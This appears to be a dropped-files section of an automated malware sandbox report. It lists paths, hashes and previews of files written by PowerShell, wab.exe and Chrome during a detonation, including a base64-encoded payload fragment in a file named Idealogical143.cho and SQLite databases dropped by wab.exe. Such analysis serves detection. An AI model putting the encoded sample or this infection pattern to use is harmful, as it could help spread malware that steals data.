                                                                                                              Preview:{. "geoplugin_request":"191.96.150.225",. "geoplugin_status":200,. "geoplugin_delay":"2ms",. "geoplugin_credit":"Some of the returned data includes GeoLite2 data created by MaxMind, available from <a href='https:\/\/www.maxmind.com'>https:\/\/www.maxmind.com<\/a>.",. "geoplugin_city":"New York",. "geoplugin_region":"New York",. "geoplugin_regionCode":"NY",. "geoplugin_regionName":"New York",. "geoplugin_areaCode":"",. "geoplugin_dmaCode":"501",. "geoplugin_countryCode":"US",. "geoplugin_countryName":"United States",. "geoplugin_inEU":0,. "geoplugin_euVATrate":false,. "geoplugin_continentCode":"NA",. "geoplugin_continentName":"North America",. "geoplugin_latitude":"40.7123",. "geoplugin_longitude":"-74.0068",. "geoplugin_locationAccuracyRadius":"20",. "geoplugin_timezone":"America\/New_York",. "geoplugin_currencyCode":"USD",. "geoplugin_currencySymbol":"$",. "geoplugin_currencySymbol_UTF8":"$",. "geoplugin_currencyConverter":0.}

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):8003
                                                                                                              Entropy (8bit):4.838950934453595
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:Dxoe5nVsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9smMdcU6CDpOeik:N+VoGIpN6KQkj2xkjh4iUxeLib4J
                                                                                                              MD5:4C24412D4F060F4632C0BD68CC9ECB54
                                                                                                              SHA1:3856F6E5CCFF8080EC0DBAC6C25DD8A5E18205DF
                                                                                                              SHA-256:411F07FE2630E87835E434D00DC55E581BA38ECA0C2025913FB80066B2FFF2CE
                                                                                                              SHA-512:6538B1A33BF4234E20D156A87C1D5A4D281EFD9A5670A97D61E3A4D0697D5FFE37493B490C2E68F0D9A1FD0A615D0B2729D170008B3C15FA1DD6CAADDE985A1C
                                                                                                              Malicious:false
                                                                                                              Preview:PSMODULECACHE.....$7o..z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$7o..z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

                                                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:data
                                                                                                              Category:dropped
                                                                                                              Size (bytes):1436
                                                                                                              Entropy (8bit):5.439833314128707
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:24:3jFytiWSKco4KmZjKbmOIKod6emN1s4RPQoU99t7J0gt/NK3R8oHiag89MOcT4:zFysWSU4xympjms4RIoU99tK8NWR8oHP
                                                                                                              MD5:95E37424D262A861DAADC34F09A879A9
                                                                                                              SHA1:91ABA95EAE0547FE0913BAD131F25C9EC0DCD37A
                                                                                                              SHA-256:EC60AA96122C6068B5BED79215F996670335AABC9A97FD6DFCF5FED8EA43E8CD
                                                                                                              SHA-512:FBFE8A1EA6DEFA37440A9E9FA4024347DAA5F2CA524CC395A5F499CEB8DC1A0F08A6560F9F02D4CEEE22031A78BB523A09F2361B7D41A7136F6B755FE213182E
                                                                                                              Malicious:false
                                                                                                              Preview:@...e...........%.....................^..............@..........P................1]...E.....%.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..4.....................@.[8]'.\........System.Data.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServicesH................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.8..................1...L..U;V.<}........System.Numerics.<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_anlhyd2a.ak3.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ogm1bns0.mhm.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wssq5mjn.q0w.psm1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xcaoq430.eu4.ps1

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):60
                                                                                                              Entropy (8bit):4.038920595031593
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                              Malicious:false
                                                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                              C:\Users\user\AppData\Local\Temp\bhv5CE7.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              File Type:Extensible storage engine DataBase, version 0x620, checksum 0xb20b6b62, page size 32768, DirtyShutdown, Windows version 10.0
                                                                                                              Category:dropped
                                                                                                              Size (bytes):15728640
                                                                                                              Entropy (8bit):0.10106922760070924
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:1536:WSB2jpSB2jFSjlK/yw/ZweshzbOlqVqLesThEjv7veszO/Zk0P1EX:Wa6akUueqaeP6W
                                                                                                              MD5:8474A17101F6B908E85D4EF5495DEF3C
                                                                                                              SHA1:7B9993C39B3879C85BF4F343E907B9EBBDB8D30F
                                                                                                              SHA-256:56CC6547BDF75FA8CA4AF11433A7CAE673C8D1DF0DE51DBEEB19EF3B1D844A2A
                                                                                                              SHA-512:056D7FBFB21BFE87642D57275DD07DFD0DAE21D53A7CA7D748D4E89F199B3C212B4D6F5C4923BE156528556516AA8B4D44C6FC4D5287268C6AD5657FE5FEC7A0
                                                                                                              Malicious:false
                                                                                                              Preview:..kb... ...................':...{........................R.....)....{.......{3.h.T.........................-.1.':...{..........................................................................................................eJ......n........................................................................................................... .......':...{..............................................................................................................................................................................................,....{...........................................{3....................k.....{3..........................#......h.T.....................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chp62E3.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                              Category:dropped
                                                                                                              Size (bytes):106496
                                                                                                              Entropy (8bit):1.136413900497188
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                              MD5:429F49156428FD53EB06FC82088FD324
                                                                                                              SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                              SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                              SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                              Malicious:false
                                                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\chp6361.tmp

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                              Category:dropped
                                                                                                              Size (bytes):40960
                                                                                                              Entropy (8bit):0.8553638852307782
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                              MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                              SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                              SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                              SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                              Malicious:false
                                                                                                              Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                              C:\Users\user\AppData\Local\Temp\dtfhsudaxgbogptlufigqqhs

                                                                                                              Download File
                                                                                                              Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                                              File Type:Unicode text, UTF-16, little-endian text, with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2
                                                                                                              Entropy (8bit):1.0
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:3:Qn:Qn
                                                                                                              MD5:F3B25701FE362EC84616A93A45CE9998
                                                                                                              SHA1:D62636D8CAEC13F04E28442A0A6FA1AFEB024BBB
                                                                                                              SHA-256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
                                                                                                              SHA-512:98C5F56F3DE340690C139E58EB7DAC111979F0D4DFFE9C4B24FF849510F4B6FFA9FD608C0A3DE9AC3C9FD2190F0EFAF715309061490F9755A9BFDF1C54CA0D84
                                                                                                              Malicious:false
                                                                                                              Preview:..

                                                                                                              C:\Users\user\AppData\Roaming\Idealogical143.cho

                                                                                                              Download File
                                                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                              File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                              Category:dropped
                                                                                                              Size (bytes):470316
                                                                                                              Entropy (8bit):5.964943754056069
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:6144:pmWRO/EskZW8lAYGWVgCESycHeZqPQ3Sq9+7jY5Z0TOkAqS2rLue0x5s/o/:pmWe6ZBStEgCEIHeZq43BcjgNj2rm+/Y
                                                                                                              MD5:927282768278628276ABF0C79AE9413D
                                                                                                              SHA1:9F6CB01AE056C0B0501385D94A6ADF22A52DBD2C
                                                                                                              SHA-256:0FB7017C171F4C64674898F94258C4F8CB4C63064FE12A34FD78F174F4C4CC01
                                                                                                              SHA-512:985BA4499A473D3AA247B5EAA73C9ED8140D3E19333489C71E2E69BACB38C32B8D6B2EC98255348A98F1216BCC9EA5FF3C523EA65FA1AF23CB154D7BFC45934A
                                                                                                              Malicious:false
                                                                                                              Preview:6wLK3usChXi72G0TAHEBm+sCbXYDXCQEcQGb6wKJrrlPIiIK6wKL5nEBm4HxLuoBeOsCDhbrAjSlgfFhyCNy6wI2/HEBm+sCwBtxAZu62OrUk3EBm+sCc9TrAolscQGbMcpxAZtxAZuJFAtxAZtxAZvR4usCK1xxAZuDwQRxAZvrAszJgfnoBE4DfM1xAZvrAmPci0QkBOsC829xAZuJw+sCq0FxAZuBw5ztaABxAZvrAoZmutREojbrAhr9cQGbgfJTeihF6wI+XHEBm4Hyhz6Kc3EBm3EBm3EBm+sC+ODrAr4+6wKNV4sMEHEBm3EBm4kME+sCoqHrApXzQnEBm+sCIpOB+kT2BAB11OsCpzXrAsWciVwkDHEBm+sC/tKB7QADAADrAq5ScQGbi1QkCOsC8svrAnV4i3wkBHEBm3EBm4nrcQGbcQGbgcOcAAAA6wJ/h3EBm1PrAt+jcQGbakDrAp/r6wK9FInr6wKQQ3EBm8eDAAEAAACAZAPrAijBcQGbgcMAAQAA6wJs3nEBm1NxAZtxAZuJ6+sCEFFxAZuJuwQBAABxAZvrAneHgcMEAQAA6wJqLOsCWtlT6wKxTnEBm2r/cQGb6wJKWoPCBXEBm3EBmzH2cQGbcQGbMcnrAo836wIwAosacQGbcQGbQXEBm3EBmzkcCnX0cQGbcQGbRusCeIVxAZuAfAr7uHXf6wLo03EBm4tECvxxAZtxAZsp8HEBm3EBm//ScQGb6wJJKrpE9gQAcQGb6wLP2jHAcQGb6wKeUIt8JAxxAZtxAZuBNAdnzapM6wK1musCU7yDwARxAZvrAtCXOdB14+sC7bpxAZuJ++sC4ZzrAoo//9frAhsbcQGbXwUjqe6wb/OjPXQx5jriYRi/K4t2euqg5grJInrJg7DssG8Z7iguu96Wnd0pTFsCeUfXKpALRq0B9GLNjuAirV5MW7zH9FMqWr1IyL5JaYsjwKq0vMCfyK3xeM0TwKr99RbyzRPA

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 1 22:14:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2677
                                                                                                              Entropy (8bit):3.982935300013458
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:8S1dssT59WEHlidAKZdA19ehwiZUklqehHy+3:8SksvWeoy
                                                                                                              MD5:C68E4A217430CC9BA9BC30F99BBC457B
                                                                                                              SHA1:42A6610313B02C5C097B2ADEFFA837B67AC5979E
                                                                                                              SHA-256:D52218B791AE73B51E0D99DC5BDCDA02F55B3AC55618F5A54B3F3D516F19CE4D
                                                                                                              SHA-512:A790D2579139F1B3DDB96B041AC6DEC62B2771FB6EE24137DA04352008609112F5CC7B1DAB8BE11DAA22980BC7CF0ABB5F6BBE5260E2C927CD9D14EE870A87E5
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ...$+.,......3M....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........T........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 1 22:14:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2679
                                                                                                              Entropy (8bit):3.9996103113047985
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:8pdssT59WEHlidAKZdA1weh/iZUkAQkqehYy+2:8QsvW89QBy
                                                                                                              MD5:7AEBB1F090C3F7387DFACCC66A6232C1
                                                                                                              SHA1:02434052FD37E265844381F20F7DAF637CDEF917
                                                                                                              SHA-256:8FFA5834016BBA884A70000AA06C7F091C6B2634EAC1117DE5B9ED7350F9EBE7
                                                                                                              SHA-512:9546DCC5CFA929F78781B414CD3EDCFB11012156BD92951F6166DAE2F300FF90A56B4978F9FF58A36E3C7CDB373F070A22BC1BF8C6005031EE39FDB2AD6C5CE4
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ...$+.,....|y(M....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........T........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2693
                                                                                                              Entropy (8bit):4.009811390615862
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:8xWdssT59sHlidAKZdA14tseh7sFiZUkmgqeh7sqy+BX:8xbsvcn0y
                                                                                                              MD5:B7F947810626FE6FB8FC15C54370D377
                                                                                                              SHA1:86A340649DF1C887DA44AB97ECDBA866EF5B26BE
                                                                                                              SHA-256:E10B20270C5B93944EE213B26ACF891C4317E5C3B13215CC981975D86AE85287
                                                                                                              SHA-512:0033E61D0885E1689C5D82BC2BC03F1D14B63B1FA8B8BE7A72152A4308CAFB76C8807C9D506CCF8F4823E1E20204D934BEF3C478CB966F1DD20F20567CA0B081
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........T........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 1 22:14:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2681
                                                                                                              Entropy (8bit):3.998196103985813
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:8HdssT59WEHlidAKZdA1vehDiZUkwqeh8y+R:8WsvWHyy
                                                                                                              MD5:E7FD7FB93B0FC8AC35FE684BB79A459B
                                                                                                              SHA1:5B0FD38141F39F7A443C22C96B00E12CCD6B9CD7
                                                                                                              SHA-256:E4A5453BB1E45E03D936CD78EB29302DE6DE48EDE1629221039E1A45096A2537
                                                                                                              SHA-512:FBF406126054E5D32007634EC35B5F9674E99F945AF82381763CA44CC10C22D93B17A457F9C7BC9A25B95B78C6D90AC304FF43E8043219ED6E5D58B7DB48AE7B
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ...$+.,.....S"M....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........T........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed May 1 22:14:22 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                              Category:dropped
                                                                                                              Size (bytes):2681
                                                                                                              Entropy (8bit):3.9865720015676676
                                                                                                              Encrypted:false
                                                                                                              SSDEEP:48:8idssT59WEHlidAKZdA1hehBiZUk1W1qehWy+C:8/svW392y
                                                                                                              MD5:88AA52CAE6A50C89254F1FB63609CB5A
                                                                                                              SHA1:164E86F9AE07A69E3B59586D378D205EB1B8B9B5
                                                                                                              SHA-256:638B2BBAC2FBED016D0B023EF30F1E6976936174070AF89FB13DA7380DA16DC1
                                                                                                              SHA-512:2A7D5C2CBF6F7639C00B4E4A8DCF36BE2F20B8695B99EF964060DA646E9918EBF80725E923889C0B4145728FAD21EFEA11ADB287C44E7B36246D5E53D06A4708
                                                                                                              Malicious:false
                                                                                                              Preview:L..................F.@.. ...$+.,....F.+M....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.X.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.X.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.X.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.X............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.X............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........T........C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

                                                                                                              Download File
                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
